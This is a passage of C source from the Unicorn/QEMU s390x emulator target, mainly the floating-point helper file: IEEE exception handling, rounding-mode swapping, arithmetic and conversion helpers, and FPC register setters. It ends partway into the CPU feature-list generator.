env->per_address = env->psw.addr; env->per_perc_atmid |= PER_CODE_EVENT_STORE | get_per_atmid(env); /* FIXME: We currently have no way to detect the address space used to trigger the watchpoint. For now just assume it is the current default ASC. This turns out to be true except when the MVCP and MVCS instructions are used. */ env->per_perc_atmid |= env->psw.mask & (PSW_MASK_ASC) >> 46; /* Remove all watchpoints to re-execute the code. A PER exception will be triggered, it will call load_psw which will recompute the watchpoints. */ cpu_watchpoint_remove_all(cs, BP_CPU); cpu_loop_exit_noexc(cs); } } /* Unaligned accesses are only diagnosed with MO_ALIGN. At the moment, this is only for the atomic operations, for which we want to raise a specification exception.
*/ void s390x_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; tcg_s390_program_interrupt(env, PGM_SPECIFICATION, retaddr); } void helper_uc_s390x_exit(CPUS390XState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); }
/* unicorn-2.1.1/qemu/target/s390x/fpu_helper.c */
/* * S/390 FPU helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif #define RET128(F) (env->retxl = F.low, F.high) uint8_t s390_softfloat_exc_to_ieee(unsigned int exc) { uint8_t s390_exc = 0; s390_exc |= (exc & float_flag_invalid) ? S390_IEEE_MASK_INVALID : 0; s390_exc |= (exc & float_flag_divbyzero) ? S390_IEEE_MASK_DIVBYZERO : 0; s390_exc |= (exc & float_flag_overflow) ? S390_IEEE_MASK_OVERFLOW : 0; s390_exc |= (exc & float_flag_underflow) ? S390_IEEE_MASK_UNDERFLOW : 0; s390_exc |= (exc & float_flag_inexact) ? S390_IEEE_MASK_INEXACT : 0; return s390_exc; } /* Should be called after any operation that may raise IEEE exceptions. */ static void handle_exceptions(CPUS390XState *env, bool XxC, uintptr_t retaddr) { unsigned s390_exc, qemu_exc; /* Get the exceptions raised by the current operation. Reset the fpu_status contents so that the next operation has a clean slate.
*/ qemu_exc = env->fpu_status.float_exception_flags; if (qemu_exc == 0) { return; } env->fpu_status.float_exception_flags = 0; s390_exc = s390_softfloat_exc_to_ieee(qemu_exc); /* * IEEE-Underflow exception recognition exists if a tininess condition * (underflow) exists and * - The mask bit in the FPC is zero and the result is inexact * - The mask bit in the FPC is one * So tininess conditions that are not inexact don't trigger any * underflow action in case the mask bit is not one. */ if (!(s390_exc & S390_IEEE_MASK_INEXACT) && !((env->fpc >> 24) & S390_IEEE_MASK_UNDERFLOW)) { s390_exc &= ~S390_IEEE_MASK_UNDERFLOW; } /* * FIXME: * 1. Right now, all inexact conditions are indicated as * "truncated" (0) and never as "incremented" (1) in the DXC. * 2. Only traps due to invalid/divbyzero are suppressing. Other traps * are completing, meaning the target register has to be written! * This, however, will mean that we have to write the register before * triggering the trap - impossible right now. */ /* * invalid/divbyzero cannot coexist with other conditions. * overflow/underflow however can coexist with inexact, we have to * handle it separately. */ if (s390_exc & ~S390_IEEE_MASK_INEXACT) { if (s390_exc & ~S390_IEEE_MASK_INEXACT & env->fpc >> 24) { /* trap condition - inexact reported along */ tcg_s390_data_exception(env, s390_exc, retaddr); } /* nontrap condition - inexact handled differently */ env->fpc |= (s390_exc & ~S390_IEEE_MASK_INEXACT) << 16; } /* inexact handling */ if (s390_exc & S390_IEEE_MASK_INEXACT && !XxC) { /* trap condition - overflow/underflow _not_ reported along */ if (s390_exc & S390_IEEE_MASK_INEXACT & env->fpc >> 24) { tcg_s390_data_exception(env, s390_exc & S390_IEEE_MASK_INEXACT, retaddr); } /* nontrap condition */ env->fpc |= (s390_exc & S390_IEEE_MASK_INEXACT) << 16; } } int float_comp_to_cc(CPUS390XState *env, int float_compare) { switch (float_compare) { case float_relation_equal: return 0; case float_relation_less: return 1; case float_relation_greater: return 2; case float_relation_unordered: return 3; default: cpu_abort(env_cpu(env), "unknown return value for float compare\n"); } } /* condition codes for unary FP ops */ uint32_t set_cc_nz_f32(float32 v) { if (float32_is_any_nan(v)) { return 3; } else if (float32_is_zero(v)) { return 0; } else if (float32_is_neg(v)) { return 1; } else { return 2; } } uint32_t set_cc_nz_f64(float64 v) { if (float64_is_any_nan(v)) { return 3; } else if (float64_is_zero(v)) { return 0; } else if (float64_is_neg(v)) { return 1; } else { return 2; } } uint32_t set_cc_nz_f128(float128 v) { if (float128_is_any_nan(v)) { return 3; } else if (float128_is_zero(v)) { return 0; } else if (float128_is_neg(v)) { return 1; } else { return 2; } } static inline uint8_t round_from_m34(uint32_t m34) { return extract32(m34, 0, 4); } static inline bool xxc_from_m34(uint32_t m34) { /* XxC is bit 1 of m4 */ return extract32(m34, 4 + 3 - 1, 1); } /* 32-bit FP addition */ uint64_t HELPER(aeb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_add(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP addition */ uint64_t HELPER(adb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_add(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP addition */ uint64_t HELPER(axb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_add(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status);
handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 32-bit FP subtraction */ uint64_t HELPER(seb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_sub(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP subtraction */ uint64_t HELPER(sdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_sub(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP subtraction */ uint64_t HELPER(sxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_sub(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 32-bit FP division */ uint64_t HELPER(deb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_div(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP division */ uint64_t HELPER(ddb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_div(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP division */ uint64_t HELPER(dxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_div(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 32-bit FP multiplication */ uint64_t HELPER(meeb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_mul(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP multiplication */ uint64_t HELPER(mdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_mul(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64/32-bit FP multiplication */ uint64_t HELPER(mdeb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float32_to_float64(f2, &env->fpu_status); ret = float64_mul(f1, ret, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP multiplication */ uint64_t HELPER(mxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_mul(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 128/64-bit FP multiplication */ uint64_t HELPER(mxdb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t f2) { float128 ret = float64_to_float128(f2, &env->fpu_status); ret = float128_mul(make_float128(ah, al), ret, &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* convert 32-bit float to 64-bit float */ uint64_t HELPER(ldeb)(CPUS390XState *env, uint64_t f2) { float64 ret = float32_to_float64(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* convert 128-bit float to 64-bit float */ uint64_t HELPER(ldxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = float128_to_float64(make_float128(ah, al), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 128-bit float */ uint64_t HELPER(lxdb)(CPUS390XState *env, uint64_t f2) { float128 ret = float64_to_float128(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* convert 32-bit float to 128-bit float */ 
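/*
 * Aside: the m34-taking conversion helpers in this file all share one
 * shape - install the rounding mode requested in m34 (bits 0-3), do the
 * conversion, restore the previous mode, then let handle_exceptions()
 * raise any pending traps, with xxc_from_m34() suppressing the inexact
 * exception when the XxC bit is set. A minimal sketch of that shape
 * (illustrative only, not part of the original file, hence compiled out):
 */
#if 0
static uint64_t sketch_cvt_f64_to_f32(CPUS390XState *env, uint64_t f2,
                                      uint32_t m34)
{
    /* bits 0-3 of m34 select the rounding mode for this operation */
    int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34));
    float32 ret = float64_to_float32(f2, &env->fpu_status);

    s390_restore_bfp_rounding_mode(env, old_mode);
    /* XxC set -> the inexact exception is not recognized */
    handle_exceptions(env, xxc_from_m34(m34), GETPC());
    return ret;
}
#endif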
uint64_t HELPER(lxeb)(CPUS390XState *env, uint64_t f2) { float128 ret = float32_to_float128(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* convert 64-bit float to 32-bit float */ uint64_t HELPER(ledb)(CPUS390XState *env, uint64_t f2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = float64_to_float32(f2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 32-bit float */ uint64_t HELPER(lexb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = float128_to_float32(make_float128(ah, al), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* 32-bit FP compare */ uint32_t HELPER(ceb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float32_compare_quiet(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 64-bit FP compare */ uint32_t HELPER(cdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float64_compare_quiet(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 128-bit FP compare */ uint32_t HELPER(cxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { int cmp = float128_compare_quiet(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } int s390_swap_bfp_rounding_mode(CPUS390XState *env, int m3) { int ret = env->fpu_status.float_rounding_mode; switch (m3) { case 0: /* current mode */ break; case 1: /* round to nearest with ties away from 0 */ set_float_rounding_mode(float_round_ties_away, &env->fpu_status); break; case 3: /* round to prepare for shorter precision */ set_float_rounding_mode(float_round_to_odd, &env->fpu_status); break; case 4: /* round to nearest with ties to even */ set_float_rounding_mode(float_round_nearest_even, &env->fpu_status); break; case 5: /* round to zero */ set_float_rounding_mode(float_round_to_zero, &env->fpu_status); break; case 6: /* round to +inf */ set_float_rounding_mode(float_round_up, &env->fpu_status); break; case 7: /* round to -inf */ set_float_rounding_mode(float_round_down, &env->fpu_status); break; default: g_assert_not_reached(); } return ret; } void s390_restore_bfp_rounding_mode(CPUS390XState *env, int old_mode) { set_float_rounding_mode(old_mode, &env->fpu_status); } /* convert 64-bit int to 32-bit float */ uint64_t HELPER(cegb)(CPUS390XState *env, int64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = int64_to_float32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit int to 64-bit float */ uint64_t HELPER(cdgb)(CPUS390XState *env, int64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = int64_to_float64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit int to 128-bit float */ uint64_t HELPER(cxgb)(CPUS390XState *env, int64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 
ret = int64_to_float128(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return RET128(ret); } /* convert 64-bit uint to 32-bit float */ uint64_t HELPER(celgb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = uint64_to_float32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit uint to 64-bit float */ uint64_t HELPER(cdlgb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = uint64_to_float64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit uint to 128-bit float */ uint64_t HELPER(cxlgb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 ret = uint64_to_float128(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return RET128(ret); } /* convert 32-bit float to 64-bit int */ uint64_t HELPER(cgeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int64_t ret = float32_to_int64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 64-bit int */ uint64_t HELPER(cgdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int64_t ret = float64_to_int64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 64-bit int */ uint64_t HELPER(cgxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 v2 = make_float128(h, l); int64_t ret = float128_to_int64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 32-bit float to 32-bit int */ uint64_t HELPER(cfeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int32_t ret = float32_to_int32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 32-bit int */ uint64_t HELPER(cfdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int32_t ret = float64_to_int32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 32-bit int */ uint64_t HELPER(cfxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 v2 = make_float128(h, l); int32_t ret = float128_to_int32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 32-bit float to 64-bit uint */ uint64_t HELPER(clgeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = 
s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint64_t ret; v2 = float32_to_float64(v2, &env->fpu_status); ret = float64_to_uint64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 64-bit uint */ uint64_t HELPER(clgdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint64_t ret = float64_to_uint64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 64-bit uint */ uint64_t HELPER(clgxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint64_t ret = float128_to_uint64(make_float128(h, l), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 32-bit float to 32-bit uint */ uint64_t HELPER(clfeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint32_t ret = float32_to_uint32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 32-bit uint */ uint64_t HELPER(clfdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint32_t ret = float64_to_uint32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 32-bit uint */ uint64_t HELPER(clfxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint32_t ret = float128_to_uint32(make_float128(h, l), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* round to integer 32-bit */ uint64_t HELPER(fieb)(CPUS390XState *env, uint64_t f2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = float32_round_to_int(f2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* round to integer 64-bit */ uint64_t HELPER(fidb)(CPUS390XState *env, uint64_t f2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = float64_round_to_int(f2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* round to integer 128-bit */ uint64_t HELPER(fixb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 ret = float128_round_to_int(make_float128(ah, al), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return RET128(ret); } /* 32-bit FP compare and signal */ uint32_t HELPER(keb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float32_compare(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 64-bit FP compare and signal */ uint32_t HELPER(kdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float64_compare(f1, f2, 
&env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 128-bit FP compare and signal */ uint32_t HELPER(kxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { int cmp = float128_compare(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 32-bit FP multiply and add */ uint64_t HELPER(maeb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float32 ret = float32_muladd(f2, f3, f1, 0, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP multiply and add */ uint64_t HELPER(madb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float64 ret = float64_muladd(f2, f3, f1, 0, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 32-bit FP multiply and subtract */ uint64_t HELPER(mseb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float32 ret = float32_muladd(f2, f3, f1, float_muladd_negate_c, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP multiply and subtract */ uint64_t HELPER(msdb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float64 ret = float64_muladd(f2, f3, f1, float_muladd_negate_c, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* The rightmost bit has the number 11. */ static inline uint16_t dcmask(int bit, bool neg) { return 1 << (11 - bit - neg); } #define DEF_FLOAT_DCMASK(_TYPE) \ uint16_t _TYPE##_dcmask(CPUS390XState *env, _TYPE f1) \ { \ const bool neg = _TYPE##_is_neg(f1); \ \ /* Sorted by most common cases - only one class is possible */ \ if (_TYPE##_is_normal(f1)) { \ return dcmask(2, neg); \ } else if (_TYPE##_is_zero(f1)) { \ return dcmask(0, neg); \ } else if (_TYPE##_is_denormal(f1)) { \ return dcmask(4, neg); \ } else if (_TYPE##_is_infinity(f1)) { \ return dcmask(6, neg); \ } else if (_TYPE##_is_quiet_nan(f1, &env->fpu_status)) { \ return dcmask(8, neg); \ } \ /* signaling nan, as last remaining case */ \ return dcmask(10, neg); \ } DEF_FLOAT_DCMASK(float32) DEF_FLOAT_DCMASK(float64) DEF_FLOAT_DCMASK(float128) /* test data class 32-bit */ uint32_t HELPER(tceb)(CPUS390XState *env, uint64_t f1, uint64_t m2) { return (m2 & float32_dcmask(env, f1)) != 0; } /* test data class 64-bit */ uint32_t HELPER(tcdb)(CPUS390XState *env, uint64_t v1, uint64_t m2) { return (m2 & float64_dcmask(env, v1)) != 0; } /* test data class 128-bit */ uint32_t HELPER(tcxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t m2) { return (m2 & float128_dcmask(env, make_float128(ah, al))) != 0; } /* square root 32-bit */ uint64_t HELPER(sqeb)(CPUS390XState *env, uint64_t f2) { float32 ret = float32_sqrt(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* square root 64-bit */ uint64_t HELPER(sqdb)(CPUS390XState *env, uint64_t f2) { float64 ret = float64_sqrt(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* square root 128-bit */ uint64_t HELPER(sqxb)(CPUS390XState *env, uint64_t ah, uint64_t al) { float128 ret = float128_sqrt(make_float128(ah, al), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } static const int fpc_to_rnd[8] = { float_round_nearest_even, float_round_to_zero, float_round_up, float_round_down, -1, -1, -1, float_round_to_odd, }; /* set fpc */ void HELPER(sfpc)(CPUS390XState *env, uint64_t fpc) { if (fpc_to_rnd[fpc & 0x7] == -1 || fpc & 0x03030088u || 
(!s390_has_feat(env->uc, S390_FEAT_FLOATING_POINT_EXT) && fpc & 0x4)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } /* Install everything in the main FPC. */ env->fpc = fpc; /* Install the rounding mode in the shadow fpu_status. */ set_float_rounding_mode(fpc_to_rnd[fpc & 0x7], &env->fpu_status); } /* set fpc and signal */ void HELPER(sfas)(CPUS390XState *env, uint64_t fpc) { uint32_t signalling = env->fpc; uint32_t s390_exc; if (fpc_to_rnd[fpc & 0x7] == -1 || fpc & 0x03030088u || (!s390_has_feat(env->uc, S390_FEAT_FLOATING_POINT_EXT) && fpc & 0x4)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } /* * FPC is set to the FPC operand with a bitwise OR of the signalling * flags. */ env->fpc = fpc | (signalling & 0x00ff0000); set_float_rounding_mode(fpc_to_rnd[fpc & 0x7], &env->fpu_status); /* * If any signaling flag is enabled in the new FPC mask, a * simulated IEEE exception occurs. */ s390_exc = (signalling >> 16) & (fpc >> 24); if (s390_exc) { if (s390_exc & S390_IEEE_MASK_INVALID) { s390_exc = S390_IEEE_MASK_INVALID; } else if (s390_exc & S390_IEEE_MASK_DIVBYZERO) { s390_exc = S390_IEEE_MASK_DIVBYZERO; } else if (s390_exc & S390_IEEE_MASK_OVERFLOW) { s390_exc &= (S390_IEEE_MASK_OVERFLOW | S390_IEEE_MASK_INEXACT); } else if (s390_exc & S390_IEEE_MASK_UNDERFLOW) { s390_exc &= (S390_IEEE_MASK_UNDERFLOW | S390_IEEE_MASK_INEXACT); } else if (s390_exc & S390_IEEE_MASK_INEXACT) { s390_exc = S390_IEEE_MASK_INEXACT; } else if (s390_exc & S390_IEEE_MASK_QUANTUM) { s390_exc = S390_IEEE_MASK_QUANTUM; } tcg_s390_data_exception(env, s390_exc | 3, GETPC()); } } /* set bfp rounding mode */ void HELPER(srnm)(CPUS390XState *env, uint64_t rnd) { if (rnd > 0x7 || fpc_to_rnd[rnd & 0x7] == -1) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } env->fpc = deposit32(env->fpc, 0, 3, rnd); set_float_rounding_mode(fpc_to_rnd[rnd & 0x7], &env->fpu_status); }
/* unicorn-2.1.1/qemu/target/s390x/gen-features.c */
/* * S390 feature list generator * * Copyright IBM Corp. 2016, 2018 * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory.
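 * (Build-time note: this generator is compiled and run during the build;
 * its output is the gen-features.h header that cpu_models.h includes.)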
*/ #include <inttypes.h> #include <stdio.h> #include <string.h> #include "cpu_features_def.h" #define ARRAY_SIZE(array) (sizeof(array) / sizeof(array[0])) /***** BEGIN FEATURE DEFS *****/ #define S390_FEAT_GROUP_PLO \ S390_FEAT_PLO_CL, \ S390_FEAT_PLO_CLG, \ S390_FEAT_PLO_CLGR, \ S390_FEAT_PLO_CLX, \ S390_FEAT_PLO_CS, \ S390_FEAT_PLO_CSG, \ S390_FEAT_PLO_CSGR, \ S390_FEAT_PLO_CSX, \ S390_FEAT_PLO_DCS, \ S390_FEAT_PLO_DCSG, \ S390_FEAT_PLO_DCSGR, \ S390_FEAT_PLO_DCSX, \ S390_FEAT_PLO_CSST, \ S390_FEAT_PLO_CSSTG, \ S390_FEAT_PLO_CSSTGR, \ S390_FEAT_PLO_CSSTX, \ S390_FEAT_PLO_CSDST, \ S390_FEAT_PLO_CSDSTG, \ S390_FEAT_PLO_CSDSTGR, \ S390_FEAT_PLO_CSDSTX, \ S390_FEAT_PLO_CSTST, \ S390_FEAT_PLO_CSTSTG, \ S390_FEAT_PLO_CSTSTGR, \ S390_FEAT_PLO_CSTSTX #define S390_FEAT_GROUP_TOD_CLOCK_STEERING \ S390_FEAT_TOD_CLOCK_STEERING, \ S390_FEAT_PTFF_QTO, \ S390_FEAT_PTFF_QSI, \ S390_FEAT_PTFF_QPT, \ S390_FEAT_PTFF_STO #define S390_FEAT_GROUP_GEN13_PTFF \ S390_FEAT_PTFF_QUI, \ S390_FEAT_PTFF_QTOU, \ S390_FEAT_PTFF_STOU #define S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF \ S390_FEAT_PTFF_QSIE, \ S390_FEAT_PTFF_QTOUE, \ S390_FEAT_PTFF_STOE, \ S390_FEAT_PTFF_STOUE #define S390_FEAT_GROUP_MSA \ S390_FEAT_MSA, \ S390_FEAT_KMAC_DEA, \ S390_FEAT_KMAC_TDEA_128, \ S390_FEAT_KMAC_TDEA_192, \ S390_FEAT_KMC_DEA, \ S390_FEAT_KMC_TDEA_128, \ S390_FEAT_KMC_TDEA_192, \ 